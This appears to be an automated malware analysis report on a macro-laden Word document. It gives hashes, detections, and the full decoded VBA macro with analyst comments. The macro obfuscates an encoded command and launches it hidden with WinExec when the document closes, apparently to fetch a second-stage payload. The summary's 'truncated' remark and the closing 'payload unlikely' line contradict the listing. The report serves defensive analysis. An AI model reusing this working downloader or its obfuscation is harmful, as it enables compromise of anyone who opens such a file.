Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 901354b147cba30d…

MALICIOUS

Office (OOXML)

45.0 KB Created: 2017-05-22 22:37:00 UTC Authoring application: Microsoft Office Word 12.0000 First seen: 2019-08-04
MD5: 10a9c65499b1921019f9704b9d461f5a SHA-1: f6229c6a1b417d24451b86e7d40318f221d53b32 SHA-256: 901354b147cba30d916c0dc57a74fd24cfb44c20bcbe950aaff3e32856ea220e
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is an OOXML document containing VBA macros. The 'macros.bas' script includes a function 'palazzina' that appears to decrypt and then execute a command using WinExec. The script also contains a function 'splendido' which is truncated but seems to be intended to execute the decrypted command. This indicates the document is designed to download and execute a secondary payload.

Heuristics 3

  • ClamAV: Doc.Malware.Xenon-10059125-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Xenon-10059125-0
  • VBA project inside OOXML medium OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. A URL by itself is not a detection — see the per-URL label for the channel (macro, JS, link annotation, document body, ...) through which each URL was reached. The URLs listed below are all Office Open XML / Word XML namespace identifiers taken from the document's XML markup, not addresses the macro contacts.
    • http://schemas.openxmlformats.org/markup-compatibility/2006 In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 4808 bytes
SHA-256: 898fb378e7a197a35578f5f4b99e074fdc764f8a9cc81b9ecd42f1ab16a9635d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit

' Module: ThisDocument — the Word document class module. All executable code in
' this export lives here, including the Document_Close event handler that
' starts the chain.

' kernel32!WinExec is the only Win32 API declared in the project; it is the
' process-launch primitive called from splendido() below. The conditional
' compilation block only selects the PtrSafe form on 64-bit Office so the
' declaration resolves on both bitnesses.
#If Win64 Then
Private Declare PtrSafe Function WinExec Lib "kernel32" (ByVal salgemma As String, ByVal divelto As Long) As Long
#ElseIf Win32 Then
Private Declare Function WinExec Lib "kernel32" (ByVal salgemma As String, ByVal divelto As Long) As Long
#End If


' String decoder used for every command fragment in this macro.
'   inumidire : encoded text
'   eremita   : key made of the letters A..E (see sierra); stretched to
'               Len(inumidire) by sfruttato() before use
' Returns the decoded text in REVERSED order: each character is
' Chr(Asc(cipher_char) - sierra(key_char) - 1) (via bilancia) and is
' prepended (Chr(cedrata) + unte), so the caller (splendido) has to apply
' StrReverse to get a usable string.
Public Function palazzina(inumidire As String, eremita As String) As String
  
  Dim gasolio As Integer
  Dim adipe As Integer
  Dim udire
  Dim rodaggio As String
  Dim unte As String
  Dim prolunga As String
  Dim fare As String
  Dim cedrata As Integer

  ' Repeat the key cyclically until it is as long as the ciphertext.
  rodaggio = sfruttato(eremita, Len(inumidire))
  eremita = rodaggio
  unte = ""
  

  ' LenB(s) / 2 equals Len(s) for VBA's 2-byte-per-character BSTR strings —
  ' an obfuscated spelling of Len(inumidire).
  For udire = 1 To (LenB(inumidire) / 2)

    gasolio = sierra(Mid(eremita, udire, 1))   ' key letter -> 0..4
    prolunga = Mid(inumidire, udire, 1)
    adipe = Asc(prolunga)
    cedrata = bilancia(adipe, gasolio)         ' adipe - gasolio - 1
    ' Prepending reverses the output; RTrim("") is an empty-string no-op,
    ' presumably filler to break simple signatures.
    unte = Chr(cedrata) + unte + RTrim("")
    
  Next
  
  palazzina = unte
  
End Function

' Thin forwarding layer, reached only indirectly through Application.Run from
' folclore(). Replace(crostata, "", "") replaces nothing and is a no-op; the
' sole effect is handing the decoded command string on to splendido().
Public Function giudizio(crostata As String)
  crostata = Replace(crostata, "", "")
  Call splendido(crostata)
End Function

' Stage 1 of the chain, invoked by name from Document_Close().
' Decodes the blob returned by valanga() with the key in giocare and passes the
' result to giudizio(). The callee name is given as a string to Application.Run
' (and wrapped in Trim, another no-op), which keeps the call out of a plain
' static call graph. mancia and dovuto are declared but never used; rifasare is
' assigned an empty string and never read.
Public Sub folclore()
  Dim giocare As String
  Dim mancia As String
  Dim rifasare As String
  Dim dovuto As String

  giocare = "EDDDCDDDBEBECECCBEEBCE"   ' decode key; only the letters B..E occur
  rifasare = LTrim("")
  Application.Run Trim("giudizio"), palazzina(valanga(), giocare)
End Sub

' Final stage: builds the command line and launches it with WinExec.
'   sarto : reversed decoded command from palazzina() (via folclore/giudizio)
' The guard only runs the body when the document body text is not exactly two
' characters long; it reads like an environment / empty-document check, but the
' intent cannot be confirmed from this listing — TODO confirm.
' Both fragments were produced reversed by palazzina(), so a single StrReverse
' over the concatenation yields the runnable string. nCmdShow is Len("") = 0,
' i.e. SW_HIDE: the child process is started without a visible window.
' The WinExec return value (offerta) is never inspected.
Public Function splendido(sarto As String)
  Dim offerta As Integer
 
  If Len(ActiveDocument.Content.Text) <> 2 Then
    offerta = WinExec(StrReverse(sarto + " " & palazzina("eof0gzg", "BB")), Len(""))
  End If
End Function

' Core of the substitution: plaintext code = ciphertext code - key digit - 1.
' Int() applied to an Integer expression is a no-op.
Public Function bilancia(attrito As Integer, carapace As Integer) As Integer
  bilancia = Int(attrito - carapace - 1)
End Function

' Key-stretching helper: appends the characters of esagono cyclically until the
' result is ghisa characters long.
'   esagono : the short key
'   ghisa   : target length (Len of the ciphertext in palazzina)
' If ghisa <= Len(esagono) the loop body never runs and esagono is returned
' unchanged. LenB/2 is again an obfuscated Len.
Public Function sfruttato(esagono As String, ghisa As Integer) As String
   Dim gittata As Integer
   Dim africano As String
   africano = esagono
   
   Dim dinnanzi As Integer
   dinnanzi = 0
   
   For gittata = (LenB(esagono) / 2) To ghisa - 1
     ' Wrap the key index when the whole key has been consumed.
     If dinnanzi = (LenB(esagono) / 2) Then
       dinnanzi = 0
     End If
     
     ' (((dinnanzi) + 1) - 0) is just dinnanzi + 1 (1-based Mid position).
     africano = africano & Mid(esagono, (((dinnanzi) + 1) - 0), 1)
     
     dinnanzi = dinnanzi + 1
   Next
   
   sfruttato = africano
End Function


' Maps one key letter to a digit: "A".."E" -> 0..4.
' nettuno holds six letters but the loop runs 1 To 5, so "F" is never matched.
' The function has no declared return type and nothing is assigned on the
' no-match path, so it then returns Variant Empty, which coerces to 0 in the
' arithmetic of bilancia(). The keys used in this macro ("BB" and the one in
' folclore) only contain B..E, so that path is not taken in practice.
Public Function sierra(posa As String)
  Dim nettuno As String
  Dim sfinge As Integer
  nettuno = "ABCDEF"
  
  Dim currentposa As String

  For sfinge = 1 To 5
    currentposa = Mid(nettuno, sfinge, 1)
    If currentposa = RTrim(posa) Then
       sierra = sfinge - 1
    End If
    
  Next
  
End Function

' Auto-exec trigger: Word raises this event when the document is closed, so the
' chain starts at close time rather than at open time (Document_Close is an
' olevba AutoExec keyword — useful detection hook). 2 = (1 + 1) is always True;
' the condition is decorative. folclore is called by name via Application.Run.
Private Sub Document_Close()
  If 2 = (1 + 1) Then
    Application.Run "folclore"
  End If
End Sub

' Returns the encoded payload string. It is assembled from a series of short
' concatenated literals (doubled quotes inside them are escaped quote
' characters), presumably split up to defeat simple string signatures. The
' plaintext only exists at run time, after palazzina() decodes it with the key
' held in folclore().
Public Function valanga()
  Dim spegnere As String

  spegnere = "4g$tr{ivumgqo%0qqu%/H"

  spegnere = spegnere + "}jg$F|tewu%/Hrrpdpi%*"
  spegnere = spegnere + "Qj|1Sfmigx""X{xwjp1Pj"
  spegnere = spegnere + "y0ZjgGpmhrx-0Iq|qqrdf"
  spegnere = spegnere + "Knnh-,lxxs>33p{p{q{qy"

  spegnere = spegnere + "eghdf}g|2grq3rksq4sts"


  spegnere = spegnere + "rd3rfi,1$(iqz>ERUFFWF"
  spegnere = spegnere + "#."",avqkr2i|h+-?""Xv"
  spegnere = spegnere + "fuy0Stthgvx%(iry>ETRI"


  spegnere = spegnere + "CYD,_wpkr0h}j+?,Qi{1Q"
  spegnere = spegnere + "gljfy#V{xygp3Six2ZifG"
  spegnere = spegnere + "nngsw.1Gq|snrfiWxvlrk"


  spegnere = spegnere + ",)mvys?22p{sxq{szgfff"
  spegnere = spegnere + "g|d}0hrr2v0umrBniAtss"
  spegnere = spegnere + "sf++"


  valanga = spegnere

End Function

' Remaining VBA components of the project: Module1 and Module2 (only the name
' attribute is exported) and UserForm1, UserForm2 and Class1 (attribute headers
' only). No executable code is shown for any of them in this listing; all
' behaviour observed above sits in ThisDocument.
Attribute VB_Name = "Module1"

Attribute VB_Name = "Module2"

Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{1C8CEDB2-20C0-476E-8BA9-343463B63BAF}{5FED400E-130E-419F-AAC0-33FA318974CA}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "UserForm2"
Attribute VB_Base = "0{BDA89CFE-85EC-4CD8-808E-8ABA60549A47}{C714152F-E517-48F7-90DF-EF4490E07F00}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 27136 bytes
SHA-256: b99841a1c0781260d0c4908e2fec82343bb7259f353758ba7a64864623bc25a1
Detection
ClamAV: Doc.Malware.Xenon-10059125-0
Obfuscation or payload: unlikely